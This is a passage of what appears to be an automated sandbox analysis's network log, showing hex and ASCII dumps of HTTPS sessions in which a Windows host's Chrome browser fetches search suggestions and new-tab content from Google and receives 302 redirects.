Cr240"0H0\7c<Fto82'5qk%2CF9#exQ[L\|3>/u:T7(yM?V<?.1aO?dAH'MpBTmVn Ip>k\|1n<FbfQ1s2{*6PpobM
2024-04-26 15:12:38 UTC	1255	IN	Data Raw: 6d 46 aa bb 68 49 1d 72 6b 3e 29 26 77 db e5 af d5 14 09 ba 8a 5b fb 7c 5f 12 62 f5 5e 36 d7 e6 ef c4 89 45 2d 24 dc 50 d8 b5 1e 8b c9 bb bf dd 3f 45 78 2c 66 ee 3b 59 18 a6 75 f1 67 4e b2 a4 34 0e 97 56 9f a4 02 20 b0 3e 92 a7 35 32 ba ca 4a 5c 5e ee 59 2b 23 74 9e 92 c4 35 58 43 d9 0f 5e 35 db 94 e5 10 84 b0 c1 79 4a 94 d9 ad 99 86 73 48 5c 61 ea d2 d6 41 1d c9 a1 1f 57 d2 88 75 b2 f6 77 b6 cf 97 5c 22 59 e9 3c c2 a5 af e3 78 a6 f5 c6 f2 f6 0f ab fb 3d ae fa b8 77 8c e3 f7 88 ee a0 35 fa 5c a8 0c b0 1c 03 b2 29 72 46 6d 02 03 01 00 01 12 80 02 31 7c ed 26 5f 9e 5d 85 0e f4 74 8c 35 13 26 b2 45 6f 71 73 d3 d8 af 7c 00 e2 30 52 c3 74 c0 3e ac 8f a3 85 97 a8 f7 28 2a e9 75 16 06 af cd 7c e9 46 71 a1 ef dd 02 3f 7a 17 c6 e3 06 0a 0d 18 d3 80 d7 18 ad cd 4c Data Ascii: mFhIrk>)&w[\|_b^6E-$P?Ex,f;YugN4V >52J\^Y+#t5XC^5yJsH\aAWuw\"Y<x=w5\)rFm1\|&_]t5&Eoqs\|0Rt>(*u\|Fq?zL
2024-04-26 15:12:38 UTC	1255	IN	Data Raw: 9a 9c 18 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 02 23 49 44 41 54 78 01 8d 53 bf 4f 54 41 10 fe e6 b8 5f e2 c5 13 e9 d4 3b 89 85 b1 f3 0f 30 e4 9e 56 36 da 58 58 d9 9b 48 fc 07 34 11 42 62 63 69 a3 a5 52 f8 07 d8 19 23 ef 90 84 58 69 62 a1 46 0b 48 54 82 14 dc 11 0e c8 dd ee 0e 33 b3 ef 5d 20 40 c2 4b 36 bb fb 66 e7 9b 6f be 99 21 c8 57 9b fd 96 d0 08 9e 72 e0 16 5c 20 d9 a1 0b 1e 8c 20 f7 6c 87 fe f7 f2 3f 70 0a ef 66 76 5f 4e a6 54 7b f6 bd 05 b8 f9 a1 d1 1e e4 4e 4c f0 01 39 00 87 83 40 9e 29 29 22 b8 69 70 1e 71 5f 14 b1 9a a3 1c c5 2e 67 7d 24 bb 63 e6 0c 84 3c a6 05 20 24 7a 89 8e 60 0a c8 a2 ab a3 32 31 30 63 63 41 58 59 19 b0 82 28 83 dc 99 71 a9 5e a2 57 77 27 d0 1c 2b 91 6a 63 d1 e3 6e f7 ee Data Ascii: sRGBgAMAa#IDATxSOTA_;0V6XXH4BbciR#XibFHT3] @K6fo!Wr\ l?pfv_NT{NL9@))"ipq_.g}$c< $z`210ccAXY(q^Ww'+jcn
2024-04-26 15:12:38 UTC	1255	IN	Data Raw: 7e 7a db 6f fc 6e 94 b7 89 5f ea ce 03 8d d6 f1 29 f1 7a d0 e6 91 c5 22 9b 1f 15 15 99 82 04 8c dc d4 75 a1 44 7a a4 8a 07 0a 82 62 c6 2c 7c 12 5b 10 8b 91 9b b8 4b 91 68 8b c1 ae ca 8c d5 ff 91 f1 c6 16 08 e6 1a f5 0b cf 4b aa b8 7c cd fa fe 5b 9f be ef 4d 15 b0 f8 ee f1 d1 62 f6 be 3a 64 33 77 53 ec f1 67 31 03 be a1 29 d9 6e a8 be 48 e2 0f b2 2b 58 e3 43 41 71 f2 71 d0 9e 3b 11 7b b6 ed 1e f6 02 a4 1c 52 e2 d3 a8 18 55 96 e3 53 f3 75 62 b1 62 25 d9 5c 37 2c b8 75 f7 46 88 5b d5 bd fb d9 15 b3 d0 ff 64 36 e5 15 58 f6 35 31 ea 62 f4 db 68 4a 50 dd 43 3b b0 17 f0 d4 52 dd 25 44 03 84 01 3b 40 00 0f ec bc 82 17 56 b0 4c ae 67 0b 29 be 06 be 2f 56 93 b0 1d 17 2b 01 c1 07 73 89 24 83 cb 72 52 dd b0 e3 6f a4 33 ef 83 ed 1f 9f aa 16 90 60 60 7d 9e 67 88 41 24 Data Ascii: ~zon_)z"uDzb,\|[KhK\|[Mb:d3wSg1)nH+XCAqq;{RUSubb%\7,uF[d6X51bhJPC;R%D;@VLg)/V+s$rRo3``}gA$
2024-04-26 15:12:38 UTC	1255	IN	Data Raw: 1f 7a 34 d3 84 8c 5a 05 98 c6 3d 44 44 0f 09 85 69 90 27 21 c5 89 b7 82 80 a9 cc c6 ca df cf b2 51 6f 8d 41 3e a3 d4 00 48 48 90 16 5e 3b 4e 78 98 75 6b 25 05 bc 7c 27 97 04 9e 20 ad 08 fb 8d 67 5e 86 c7 f7 fd 00 c6 5f 3a 41 53 af 9f 31 0d 5f 7b e5 45 f4 e9 95 17 e3 ba 5f cd 84 e9 c2 41 78 57 9a 11 40 7e 7e e8 96 0d 66 06 ed ba 04 41 a7 5d 62 72 e0 88 c4 c7 d3 59 42 f5 fe af 3e 79 10 b6 3c fe 3f 70 ec f5 99 3a a2 3b d8 e0 8a 8b 17 55 cb 29 8a 18 7b e1 28 8e 7d ef 08 fc e1 3f be 40 5f 5c 3b 84 9b 6e ba a2 12 95 f9 6c 88 a8 29 a3 17 75 62 e1 04 cc b2 8d e3 74 b4 62 e2 42 b2 2b 28 f8 8b 72 40 77 bf 28 66 cb bf 1c c0 c9 43 27 72 df 6c e6 e2 97 e2 67 57 bd 17 ae bd 62 59 6b 31 e3 2f bd 06 7f bd 73 02 be f1 ef af e4 e3 24 3d f6 9d 1f c0 8e 2f fd 3a 0e 5d 34 7f Data Ascii: z4Z=DDi'!QoA>HH^;Nxuk%\|' g^_:AS1_{E_AxW@~~fA]brYB>y<?p:;U){(}?@_\;nl)ubtbB+(r@w(fC'rlgWbYk1/s$=/:]4
2024-04-26 15:12:38 UTC	1255	IN	Data Raw: 64 76 c5 3d 8e 9f 9a 6d 09 dd 7b 7e ed 96 6f c3 f8 e4 6b e5 c9 12 ed fc d3 0f e3 d0 c5 67 27 3b bc fe f6 dd b0 eb bb c7 99 83 20 ce 79 47 10 5c e8 56 5f e3 a0 00 fa 12 a3 60 48 0a 7e 23 b1 13 fa f2 e4 7d 35 a9 f9 c4 3d ff 91 09 ce 2b ad 45 94 fc a0 57 f8 5d 99 ff ef 9f fc a1 9d df b9 e9 43 30 bc fc 82 6c 01 af e3 f5 9b 77 67 6b 38 09 3f 4d 2b 6c f3 f3 5b bf 43 bb 9e 7b b5 40 1a 05 3a df 7e ad 81 5c 03 91 0c e1 e0 86 bd 14 43 06 a8 1b 44 a4 d0 19 0a d7 cf 3c 1f 8a 25 cc ce 54 25 0d e5 22 c8 1d 37 fd 22 8c 64 50 1b 16 64 2f 24 67 ec 7b 47 e1 a1 5d 2f c3 d8 f3 47 4a b1 04 76 de b9 1a 86 87 f8 81 4a b5 84 3f df 03 fb bf 7f 2c 67 8b 0b e0 89 bb d6 40 99 e7 27 69 93 d9 e4 1f 7d e6 15 78 e0 d1 ff a3 c9 43 a7 32 ee 75 84 85 16 ae 82 10 37 4e 05 ae 9f 4b 64 aa 2f Data Ascii: dv=m{~okg'; yG\V_`H~#}5=+EW]C0lwgk8?M+l[C{@:~\CD<%T%"7"dPd/$g{G]/GJvJ?,g@'i}xC2u7NKd/
2024-04-26 15:12:38 UTC	1255	IN	Data Raw: 9b 62 ef e2 65 81 1e 8f b8 04 d5 0e 41 51 40 bd 9e bc 5f 3b c3 d8 76 5c ef f9 05 49 6b 1e bd 20 be a3 dc 56 66 bc 47 ab 2c 86 f0 10 7c f3 86 d1 28 6f 03 3d ed f4 df 5d 3b 9a 15 bc 95 85 c4 e8 b7 58 5f 3e e4 89 51 7d 93 e2 c3 d5 96 40 f5 8e 2d bf 06 9a bb 2e 13 48 0e cc 00 50 f0 c1 66 04 c7 31 bb 06 dd 32 08 1c 7b 6c db 29 4e 9d 97 f2 40 af f0 6f aa 80 d2 ce fc fd 9a db 1a 48 9f cb fe 7d 40 95 0f 4c e9 62 45 c5 76 cc 6c 9c fc dd a1 2a 08 b9 8b f0 0c bc 32 a4 c8 d3 35 50 c8 a2 83 76 10 01 e7 58 54 b8 96 b1 45 23 96 e2 94 3e fb d4 c9 e1 58 fe bb 0d be f9 a9 8d 6f 26 2b c2 db b4 85 a3 4f ae 98 81 ce fa 1c a8 46 f3 c4 43 4a 7f 79 41 a6 71 f4 bc 41 cd cd 42 53 b0 dd 36 25 b5 4d 4f 3e 21 d8 3b 08 82 23 e0 96 d6 8b f6 e6 eb c1 25 75 53 04 a3 a6 32 f7 7e 00 66 4e Data Ascii: beAQ@_;v\Ik VfG,\|(o=];X_>Q}@-.HPf12{l)N@oH}@LbEvl*25PvXTE#>Xo&+OFCJyAqABS6%MO>!;#%uS2~fN
2024-04-26 15:12:38 UTC	1255	IN	Data Raw: a8 df 0a 3d 79 8a 2a 5c c3 ed f0 6f ef de 96 a2 6f c5 79 52 6c 47 73 7c a0 ad 1c 5b 25 91 4e 76 43 8b d8 29 9e dd 1a 8e 90 49 3d d2 c3 94 8d 85 c9 e0 5f 8f 25 39 84 b4 53 d2 28 c5 01 1b 8a 2c 1a a2 bc 63 92 df d2 67 52 be 9c ca aa 44 8b f7 64 92 70 34 93 fe 4d 0c 8c 18 4f 45 30 a1 c4 28 4a e4 93 87 23 af 5a f4 ef bf f2 16 ec 64 db 29 04 d8 fb 4f 6e fe d3 41 0c ef c6 28 b4 05 b8 f9 9b da 2f 99 74 15 8b 41 e6 79 f6 1a 30 50 57 cf ac b1 30 62 6f eb ad 4a da 54 71 8e 1c a2 51 8e e3 83 a9 cb 24 cd 81 25 4b 48 8a 42 c0 6a 4b f8 90 1c 9f 9a f0 63 53 4c b0 5e df 70 d8 56 00 79 8c 50 c4 6e 30 1c c6 a7 7d 8c c9 ad 67 12 19 89 02 47 47 0e 70 c1 96 bf 38 e2 3d d8 c1 b6 43 06 50 d9 fd 1e 8b ae 1a c6 71 68 88 51 3b 30 d8 47 40 5d 04 53 61 ea 08 07 0c af f0 f8 9f a0 1f Data Ascii: =y*\ooyRlGs\|[%NvC)I=_%9S(,cgRDdp4MOE0(J#Zd)OnA(/tAy0PW0boJTqQ$%KHBjKcSL^pVyPn0}gGGp8=CPqhQ;0G@]Sa
2024-04-26 15:12:38 UTC	1255	IN	Data Raw: 03 d0 5e 5f df 6b d6 29 52 d6 40 6d 69 96 72 d0 47 a0 a2 8f 2b c9 2b 52 b1 6c 30 79 fe 0c 2b 5c 89 b8 72 8e 9f e7 16 c4 da 5e b7 b0 df 84 0a 45 b8 40 2f f8 9c c2 90 cb f9 f3 1d 1f bd ed af 5f b5 d6 8e 69 11 60 86 2f 68 7a 10 01 e8 af 5a a0 15 6b ce 62 d7 f4 ae af 46 57 cd c2 87 9c d2 3a 1d 1f f1 34 24 75 62 59 df 88 b2 aa 5f dd 7a 4e 30 19 a6 0e 21 3f 68 eb 00 6e 11 7d 1a 53 40 50 73 6d 0d 61 14 97 d3 3e 15 4e 14 05 1c 70 0c 66 64 8c 4a c4 7a f5 77 5f e1 53 04 48 e1 d2 39 09 9b a1 65 b4 91 50 c9 9a 35 a4 28 e9 07 c5 5c 27 b8 45 c0 b5 1f 6b c7 71 e6 8d a0 f9 61 f1 2e 35 37 80 b2 a4 3b e4 a6 2b 03 5d d0 c2 70 26 7c be 0e 51 3d 54 ec 1e 9a c7 bb b2 cc 20 03 9b ac 0f ab e8 69 7f 94 c3 0a 94 5c 99 72 95 e8 b9 1f 53 f6 70 57 9c fc 64 98 b4 fe fc f8 0c f9 1e 1f Data Ascii: ^_k)R@mirG++Rl0y+\r^E@/_i`/hzZkbFW:4$ubY_zN0!?hn}S@Psma>NpfdJzw_SH9eP5(\'Ekqa.57;+]p&\|Q=T i\rSpWd
2024-04-26 15:12:38 UTC	1255	IN	Data Raw: 1c 6e 1e 51 bd 2d 2f 70 8c 95 c0 95 17 e9 39 1c 52 61 4a c7 89 61 bb 41 53 26 1b ed 98 b4 d3 40 19 85 07 58 f4 e4 64 f4 cd b1 4d 9a ac d7 a7 64 34 06 b7 aa 7c 4f 03 5d 76 93 95 b7 3c a2 0e ab bb e1 c4 e5 31 27 00 3e 29 64 6f 17 22 94 bc da 0d b0 d7 51 f6 a3 22 05 1b 9c aa 17 02 89 f4 64 36 19 9c c1 38 5d c0 98 c2 5f e3 11 26 80 71 71 c5 85 0a 32 e5 64 27 b5 4e 9b 35 07 3b 37 90 c5 26 20 b9 b3 5e 33 41 6c 8c d5 44 a1 63 19 2b 2f 19 93 57 23 39 7d 8e 98 3a 52 46 e0 fa 54 c3 64 0b 2f ca 19 8c 24 ba bc 5c d6 ca 11 aa 33 f5 29 cb 42 9e 87 1b 8c d8 0e 1f da 51 59 f8 21 0f 34 49 2e 0c ce 1c c7 70 91 b9 71 9d 20 30 d6 83 28 2e e2 bb cc 93 39 18 8a 2f cf 8b fd 27 57 e9 47 48 80 80 3e 19 bd 16 71 10 c6 c6 46 2c 4d a4 11 72 42 27 61 50 3a 0e e7 0e 01 cd ea 50 1e 3a Data Ascii: nQ-/p9RaJaAS&@XdMd4\|O]v<1'>)do"Q"d68]_&qq2d'N5;7& ^3AlDc+/W#9}:RFTd/$\3)BQY!4I.pq 0(.9/'WGH>qF,MrB'aP:P:

Session ID	Source IP	Source Port	Destination IP	Destination Port
21	192.168.2.5	49787	142.250.189.132	443

Timestamp	Bytes transferred	Direction	Data
2024-04-26 15:12:46 UTC	774	OUT	GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1 Host: www.google.com Connection: keep-alive X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlqHLAQiFoM0BCLnKzQEI+cDUFRiPzs0BGNiGzgEY642lFw== Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: 1P_JAR=2024-04-26-15; NID=513=mBpMdDuQUM098tgF-RftvJu-NPK7YfkE1CPzJF3NXnIlIFlqe9p8_ks2w5ygwrjY1WWUtQ0sj4xfJdVG3EL4CrGCzMBS9zlp7BKlEtOgW2LY1r1aYd6PiBvNiGDdaJI1Yyc2ErHauJmI6J0-6N6lH-tLw47o3FA5_-6KNrSKYXU
2024-04-26 15:12:46 UTC	1703	IN	HTTP/1.1 200 OK Date: Fri, 26 Apr 2024 15:12:46 GMT Pragma: no-cache Expires: -1 Cache-Control: no-cache, must-revalidate Content-Type: text/javascript; charset=UTF-8 Strict-Transport-Security: max-age=31536000 Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-AaQ3bbif2W_ol4MI5_r5Sw' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/cdt1 Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws" Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/cdt1"}]} Accept-CH: Sec-CH-UA-Platform Accept-CH: Sec-CH-UA-Platform-Version Accept-CH: Sec-CH-UA-Full-Version Accept-CH: Sec-CH-UA-Arch Accept-CH: Sec-CH-UA-Model Accept-CH: Sec-CH-UA-Bitness Accept-CH: Sec-CH-UA-Full-Version-List Accept-CH: Sec-CH-UA-WoW64 Permissions-Policy: unload=() Origin-Trial: Ap+qNlnLzJDKSmEHjzM5ilaa908GuehlLqGb6ezME5lkhelj20qVzfv06zPmQ3LodoeujZuphAolrnhnPA8w4AIAAABfeyJvcmlnaW4iOiJodHRwczovL3d3dy5nb29nbGUuY29tOjQ0MyIsImZlYXR1cmUiOiJQZXJtaXNzaW9uc1BvbGljeVVubG9hZCIsImV4cGlyeSI6MTY4NTY2Mzk5OX0= Origin-Trial: AvudrjMZqL7335p1KLV2lHo1kxdMeIN0dUI15d0CPz9dovVLCcXk8OAqjho1DX4s6NbHbA/AGobuGvcZv0drGgQAAAB9eyJvcmlnaW4iOiJodHRwczovL3d3dy5nb29nbGUuY29tOjQ0MyIsImZlYXR1cmUiOiJCYWNrRm9yd2FyZENhY2hlTm90UmVzdG9yZWRSZWFzb25zIiwiZXhwaXJ5IjoxNjkxNTM5MTk5LCJpc1N1YmRvbWFpbiI6dHJ1ZX0= Content-Disposition: attachment; filename="f.txt" Server: gws X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
2024-04-26 15:12:46 UTC	820	IN	Data Raw: 33 32 64 0d 0a 29 5d 7d 27 0a 5b 22 22 2c 5b 22 63 68 69 63 61 67 6f 20 62 65 61 72 73 20 64 72 61 66 74 20 63 61 6c 65 62 20 77 69 6c 6c 69 61 6d 73 22 2c 22 6e 79 74 20 63 6f 6e 6e 65 63 74 69 6f 6e 73 20 68 69 6e 74 73 20 61 70 72 69 6c 20 32 36 22 2c 22 61 70 70 6c 65 20 69 70 68 6f 6e 65 20 31 36 20 70 72 6f 20 6d 61 78 22 2c 22 73 74 61 72 62 75 63 6b 73 20 64 72 69 6e 6b 73 20 68 61 6c 66 20 6f 66 66 22 2c 22 63 68 69 63 61 67 6f 20 62 65 61 72 73 20 6e 65 77 20 73 74 61 64 69 75 6d 22 2c 22 66 6c 61 67 73 68 69 70 20 6d 65 67 61 74 72 6f 6e 20 61 75 74 6f 20 63 6f 6e 76 65 72 74 69 6e 67 20 72 6f 62 6f 74 22 2c 22 6e 65 78 74 20 67 65 6e 20 66 61 6c 6c 6f 75 74 20 75 70 64 61 74 65 22 2c 22 6c 75 66 74 68 61 6e 73 61 20 37 34 37 20 72 6f 75 67 68 Data Ascii: 32d)]}'["",["chicago bears draft caleb williams","nyt connections hints april 26","apple iphone 16 pro max","starbucks drinks half off","chicago bears new stadium","flagship megatron auto converting robot","next gen fallout update","lufthansa 747 rough
2024-04-26 15:12:46 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
22	192.168.2.5	49790	142.250.189.132	443

Timestamp	Bytes transferred	Direction	Data
2024-04-26 15:12:46 UTC	564	OUT	GET /async/ddljson?async=ntp:2 HTTP/1.1 Host: www.google.com Connection: keep-alive Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: 1P_JAR=2024-04-26-15; NID=513=mBpMdDuQUM098tgF-RftvJu-NPK7YfkE1CPzJF3NXnIlIFlqe9p8_ks2w5ygwrjY1WWUtQ0sj4xfJdVG3EL4CrGCzMBS9zlp7BKlEtOgW2LY1r1aYd6PiBvNiGDdaJI1Yyc2ErHauJmI6J0-6N6lH-tLw47o3FA5_-6KNrSKYXU

Session ID	Source IP	Source Port	Destination IP	Destination Port
23	192.168.2.5	49792	142.250.189.132	443

Timestamp	Bytes transferred	Direction	Data
2024-04-26 15:12:46 UTC	677	OUT	GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1 Host: www.google.com Connection: keep-alive X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlqHLAQiFoM0BCLnKzQEI+cDUFRiPzs0BGNiGzgEY642lFw== Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: 1P_JAR=2024-04-26-15; NID=513=mBpMdDuQUM098tgF-RftvJu-NPK7YfkE1CPzJF3NXnIlIFlqe9p8_ks2w5ygwrjY1WWUtQ0sj4xfJdVG3EL4CrGCzMBS9zlp7BKlEtOgW2LY1r1aYd6PiBvNiGDdaJI1Yyc2ErHauJmI6J0-6N6lH-tLw47o3FA5_-6KNrSKYXU
2024-04-26 15:12:47 UTC	1480	IN	HTTP/1.1 302 Found Location: https://www.google.com/sorry/index?continue=https://www.google.com/async/newtab_ogb%3Fhl%3Den-US%26async%3Dfixed:0&hl=en-US&q=EgRmgZjcGO6Ir7EGIjAT31A6jm3jiUbYeNNo7BDZAsX_AO4Yhqat1pygOlLCpUVzhhDggamCbrUDp4EqjUUyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM x-hallmonitor-challenge: CgsI74ivsQYQupKXdBIEZoGY3A Content-Type: text/html; charset=UTF-8 Strict-Transport-Security: max-age=31536000 Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws" Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]} Permissions-Policy: unload=() Origin-Trial: Ap+qNlnLzJDKSmEHjzM5ilaa908GuehlLqGb6ezME5lkhelj20qVzfv06zPmQ3LodoeujZuphAolrnhnPA8w4AIAAABfeyJvcmlnaW4iOiJodHRwczovL3d3dy5nb29nbGUuY29tOjQ0MyIsImZlYXR1cmUiOiJQZXJtaXNzaW9uc1BvbGljeVVubG9hZCIsImV4cGlyeSI6MTY4NTY2Mzk5OX0= Origin-Trial: AvudrjMZqL7335p1KLV2lHo1kxdMeIN0dUI15d0CPz9dovVLCcXk8OAqjho1DX4s6NbHbA/AGobuGvcZv0drGgQAAAB9eyJvcmlnaW4iOiJodHRwczovL3d3dy5nb29nbGUuY29tOjQ0MyIsImZlYXR1cmUiOiJCYWNrRm9yd2FyZENhY2hlTm90UmVzdG9yZWRSZWFzb25zIiwiZXhwaXJ5IjoxNjkxNTM5MTk5LCJpc1N1YmRvbWFpbiI6dHJ1ZX0= Date: Fri, 26 Apr 2024 15:12:47 GMT Server: gws Content-Length: 458 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Set-Cookie: 1P_JAR=2024-04-26-15; expires=Sun, 26-May-2024 15:12:47 GMT; path=/; domain=.google.com; Secure; SameSite=none Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-04-26 15:12:47 UTC	458	IN	Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 73 6f 72 72 79 2f 69 6e 64 65 78 3f 63 6f 6e 74 69 6e 75 65 3d 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 61 73 79 6e 63 2f 6e 65 77 74 61 62 5f 6f 67 62 25 33 46 68 Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>302 Moved</TITLE></HEAD><BODY><H1>302 Moved</H1>The document has moved<A HREF="https://www.google.com/sorry/index?continue=https://www.google.com/async/newtab_ogb%3Fh

Session ID	Source IP	Source Port	Destination IP	Destination Port
24	192.168.2.5	49791	142.250.189.132	443

Timestamp	Bytes transferred	Direction	Data
2024-04-26 15:12:46 UTC	564	OUT	GET /async/newtab_promos HTTP/1.1 Host: www.google.com Connection: keep-alive Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: 1P_JAR=2024-04-26-15; NID=513=mBpMdDuQUM098tgF-RftvJu-NPK7YfkE1CPzJF3NXnIlIFlqe9p8_ks2w5ygwrjY1WWUtQ0sj4xfJdVG3EL4CrGCzMBS9zlp7BKlEtOgW2LY1r1aYd6PiBvNiGDdaJI1Yyc2ErHauJmI6J0-6N6lH-tLw47o3FA5_-6KNrSKYXU
2024-04-26 15:12:47 UTC	1398	IN	HTTP/1.1 302 Found Location: https://www.google.com/sorry/index?continue=https://www.google.com/async/newtab_promos&q=EgRmgZjcGO6Ir7EGIjBbMe3eQAtuCL3jg7g0TShqEj30UCC7_atPViR7K19ZkkguPUrDHWkhEYx3h598qBoyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM x-hallmonitor-challenge: CgsI74ivsQYQ17r-SxIEZoGY3A Content-Type: text/html; charset=UTF-8 Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws" Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]} Permissions-Policy: unload=() Origin-Trial: Ap+qNlnLzJDKSmEHjzM5ilaa908GuehlLqGb6ezME5lkhelj20qVzfv06zPmQ3LodoeujZuphAolrnhnPA8w4AIAAABfeyJvcmlnaW4iOiJodHRwczovL3d3dy5nb29nbGUuY29tOjQ0MyIsImZlYXR1cmUiOiJQZXJtaXNzaW9uc1BvbGljeVVubG9hZCIsImV4cGlyeSI6MTY4NTY2Mzk5OX0= Origin-Trial: AvudrjMZqL7335p1KLV2lHo1kxdMeIN0dUI15d0CPz9dovVLCcXk8OAqjho1DX4s6NbHbA/AGobuGvcZv0drGgQAAAB9eyJvcmlnaW4iOiJodHRwczovL3d3dy5nb29nbGUuY29tOjQ0MyIsImZlYXR1cmUiOiJCYWNrRm9yd2FyZENhY2hlTm90UmVzdG9yZWRSZWFzb25zIiwiZXhwaXJ5IjoxNjkxNTM5MTk5LCJpc1N1YmRvbWFpbiI6dHJ1ZX0= Date: Fri, 26 Apr 2024 15:12:47 GMT Server: gws Content-Length: 417 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Set-Cookie: 1P_JAR=2024-04-26-15; expires=Sun, 26-May-2024 15:12:47 GMT; path=/; domain=.google.com; Secure; SameSite=none Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-04-26 15:12:47 UTC	417	IN	Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 73 6f 72 72 79 2f 69 6e 64 65 78 3f 63 6f 6e 74 69 6e 75 65 3d 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 61 73 79 6e 63 2f 6e 65 77 74 61 62 5f 70 72 6f 6d 6f 73 26 Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>302 Moved</TITLE></HEAD><BODY><H1>302 Moved</H1>The document has moved<A HREF="https://www.google.com/sorry/index?continue=https://www.google.com/async/newtab_promos&

Session ID	Source IP	Source Port	Destination IP	Destination Port
25	192.168.2.5	49794	142.250.189.132	443

Timestamp	Bytes transferred	Direction	Data
